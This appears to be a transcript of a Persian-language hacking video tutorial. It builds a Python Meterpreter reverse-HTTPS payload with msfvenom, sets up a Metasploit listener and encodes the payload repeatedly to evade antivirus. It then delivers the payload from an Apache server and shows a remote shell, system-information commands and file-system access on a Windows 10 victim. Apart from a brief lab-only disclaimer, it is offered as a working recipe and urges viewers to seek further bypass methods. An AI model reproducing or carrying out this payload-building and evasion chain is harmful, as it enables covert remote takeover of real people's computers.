درود به همه دوستان گل، خیلی خوش اومدیم به کانال. امروز می‌خوایم از صفر مطلق یک پیلوت بسازیم که بتونیم ویندوز 10 همون رو کنترل کنیم و به قول معروف همون هکش کنیم. از طرفی آنتی ویروس هم نتونه ما رو شناسایی کنه و جلوشو نگیره. توی هفته پیش ما یه ویدیو ساختیم، خیلی گفتن آقا این ویندوز 7 قدیمی فلانه. ببینید عملاً ربطی نداره چه ویندوزی استفاده می‌کنیم، 7 باشه، 10 باشه، 11 باشه، چون ما از آسیب پذیری خاصی از ویندوز استفاده نمی‌کنیم. عملاً داریم از بدافزار استفاده می‌کنیم. حالا اینجا من برای تست ویندوز 10 آوردم. ویندوز 10 هم آخرین ورژن هستش و میخوایم یه بدافزار بسازیم که کنارش آنتی ویروس هم دور زده بشه. قبل هر موضوعی بگم که این ویدیو فقط برای لب آزمایشیه و کسایی که تست نفوذ انجام میدن. مسئولیت هر گونه استفاده غیرقانونی به عهده خودتون هستش. خیلی خب، من اینجا یه ویندوز 10 دارم، یه دونم کالی دارم. ببینید توی کافیه برای مبحث دور زدن آنتی ویروس سرچ کنید بایپاس آنتی ویروس در هر کجا، چه توی یوتیوب، چه توی اینترنت، گوگل، هر جا سرچ کنید کلی منابع مختلف کنید، کلی منبع خوب براتون میاره که استفاده کنید. تو این ویدیو من میخوام از یه اسکریپتی به نام وان لاین پای، یعنی وان لاین پای استفاده کنم. خب یه بدافزار پایتونی بسازم، بعد کدگذاریش کنم، بعدش به ویندوز هم انتقالش بدم که ببینیم چه قابلیتایی داره. کافیه سرچ کنید وان لاین پای اسکریپت بایپاس آنتی ویروس یا هر چیزی که میخواین شبیه این. من اینو باز میکنم. خب اینو داشته باشیم برای بعدن. قبل این اولین کاری که من انجام میدم اینجا اینه که یه لیسنر راه میندازم که یادمون نره. کافیه با دستور MSF کنسول متاسپلویتمون رو بالا بیاریم، ثبت میکنم و الان تقریبا بالا اومده. حالا ممکنه برای شما بیشتر زمان ببره. خیلی خوب. خب با این دستوری که من اینجا پیست میکنم use exploit multi handler، use که یعنی که از این ماژول استفاده کن، exploit multi handler هم یعنی در واقع یه شنود چند کاره است. خب مرحله بعد کافیه من این دستوری که میگم رو بنویسیم. set payload python interpreter reverse https. خیلی خوب، اینم از این. در واقع نوع پیلودمون پایتونی هستش. توی مرحله بعد ما کافیه الهاستمون رو ست کنیم، یعنی بگیم set الهاست IP دستگاهمون. الهاست یعنی چی؟ توی ویدیو قبل من کامل راجبش توضیح دادم، ولی در واقع الهاست میشه IP ماشینی که میخواد شنود انجام بده، IP سیستم عاملی که میخواد شنود انجام بده. مثلا IP کالیمون دیگه، ما از کالی داریم شنود میکنیم. برای به دست آوردن IP چیکار میکنیم؟ کنترل شیفت تی رو بزنیم، یه تب جدید براتون باز میشه و دستور if config رو کافیه بنویسیم. میبینیم که IP ما رو اینجا برامون میندازه. من فرض میکنم IP ما میدونم 192 168 142 129 IP من هست فرضاً. خب مرحله بعد IP که ست میشه دستور set ال پورت رو میزنیم که پورت مورد نظر رو ست کنیم، پورتی که قرار رو شنود انجام شه. من میذارم 443. خیلی خب، اینم از این. بعد تموم شد دیگه، تمام مراحل شنودمون انجام شده و من دستور exploit-j رو بزنم که توی بک‌گراند کار کنه. اینجا باید که استارت رو به من بده که داد. الان کالی ما آماده شنود هستش. مرحله بعدی چیه؟ مرحله بعدی ساخت بدافزارمونه و بعد رمزنگاری کردنش هستش. خب الان من میام چیکار میکنم؟ میام داخل گیت هاب وان لاین پای و این قسمت رو کپی میکنم. خب این برای شما نصب میشه. خب من نصبش دارم اینجا دیگه و بعد از که نصب شد کافیه بنویسیم cd وان لاین پای و وارد دایرکتوریش بشی و دسترسی کامل با sudo ch mod 777 ستاره رو میدی که کامل دسترسی لازمه رو داده باشیم. و بعد از که این کارو کردیم، حالا من این دستور رو نمیذارم چون دارم. اینجا میبینین لیستای بدافزاری که من تا حالا ساختم. خب حالا با ابزار ms venom -p python interpreter اینجا بدافزارمون رو میسازیم. -p python interpreter داریم میگیم آقا نوع پیلودمون پایتونی باشه. الهاست و الپورت رو توضیح دادیم. -o test.py هم اسم اون فایلیه که میخوایم بسازیمش. فقط اینجا چون من test.py رو قبلا فکر کنم ساختم، واسه اینکه اختلال نشه دو تا تی میذارم، اینجام test.py. خب ببینیم ساخته شده با ls. آره میبینم که کاملا با موفقیت ساخته شده. مرحله بعدی اینه که من الان میخوام اینو کدگذاری کنم که آنتی ویروس متوجه حضور این بدافزار نشه. حالا با این دستور python 3 vanlai.py-m و بقیه‌اشو که دارین مشاهده میکنین داریم این فایلمون رو رمزنگاری میکنیم و قسمتی که داش اسکریپت test.py اسم فایلمون هست و آخرش هم اسم فایل جدیدی است که میخوایم بگیریم که به نام تستر
میخوایم خروجیمون باشه. بخش داش آی 5 هم که داریم مشاهده میکنیم، یعنی اینکه 5 بار انکدینگ رو انجام بده، هر چی بیشتر قوی تر. معمولا فکر کنم همون روی 3 بذارین کفایت میکنه، هر چی بیشتر قوی تره، ولی خب یه مقدار ممکنه کنتر باشه. ببین من الان ساختمش، با موفقیت ساخته شد. خب الان میخوام چیکار کنم؟ فایل رو انتقال دادم به مسیر آپاچی کالی. حالا کافی رفرش کنم ببینم که افتاده. چند بار دیگه رفرش میکنم. آها اینهاش. ببینید آره فایل با موفقیت افتاده. حالا من روش کلیک میکنم، کنترل اس، سیو میکنم توی دانلود. مثلا دانلودش کردم این قسمت، میبینید بازش میکنم. هیچ اروری از آنتی ویروس نگرفتیم و الان میایم اینجا ببینیم که سشنمون هم کامل برقرار شده. کافیه من بنویسم سشن داش ال که ارور گرفتم. آها اشتباه تایپ کردم، دوباره مینویسم سشن داش ال. میبینید بله با موفقیت انجام شده. حالا کافی بنویسم سشن داش آی 1. تموم شد. من الان عملا وارد ویندوز 10 مون شدم. دستور سیس اینفو رو میزنم اطلاعات اولیه رو بگیرم. درسته ویندوز 10 زبونش هم انگلیسیه و بقیه مشخصات اینجا کاملا دارم میبینم. حالا ببین چند تا کار دیگه با هم انجام بدیم. من اینجا مینویسم get uid ببینم که خب میگه که آقا یوزرنیمش هکه. ببینم راست میگه، آیا یوزرنیم این ویندوز 10 ما هک هستش یا نه اسمش. بریم اینجا این قسمت ببینم درسته یوزرنیمش هم هکه. این تا اینجا. حالا یه کار دیگه کنیم، بریم یه پوشه‌ای توی مسیر درایو سی اصلیش ایجاد کنیم. من اینجا برم توی درایو سی که بهتون نشون بدم. ببینید این محتویات درایو سی من هستش. الان من اگر اینجا دستور شل رو بزنم، حتی میتونیم وارد شل کامپیوتر ویندوز 10 مون هم بشیم. اینجا من دستور شل رو بزنم cd 2 نقطه دوباره بار دیگه cd 2 نقطه که برگرده و یک بار دیگه که الان من cd 2 نقطه رو بزنم، یک بار دیگه هم میزنم. خیلی خوب الان توی مسیر اصلیشیم. dir رو که بزنم اینجا بعد لیست پوش‌های موجود رو بهم بده. میبینین دقیقاً همون لیست پوش‌های موجود رو داره به من میده که چی هست، عکس، تصویر، ویدیو، هر چی که هست میتونه به شما بده. حالا ما اینجا میخوایم که یه فایل تستی ایجاد کنیم. کافیه بنویسیم amk dir مثلا hack by god. تموم شد. من اینجا الان خودم رو هک کردم. ببینید پوشه افتاد بدونیم که کاربرم خبر داشته باشه. هیچ آنتی ویروس هیچ چیزی هم اصلا آلرتی به کاربر نداد که این فایل مخربه یا هر چیز دیگه. این از این روش. یه روش خیلی ساده بود. توی دنیای اینترنت هم میتونین روش‌های خیلی بهتر، پیشرفته‌تر، بروزتر رو پیدا کنین. فقط کافیه بنویسین بایپاس آنتی ویروس، چه توی یوتیوب چه توی گوگل هر جای دیگه. ببینید کلی منبع هست. من اینجا باز کنم، کلی منبع هست که به شما اطلاعات خیلی مفیدی زیادی میدن و شما میتونید دونه دونه این مباحث رو بررسی کنین و یاد بگیرید. امیدوارم از این ویدیو خوشتون اومده باشه. اگر علاقه‌مند به تست نفوذ شبکه و هک و امنیت هستی حتما کانال منو دنبال کن.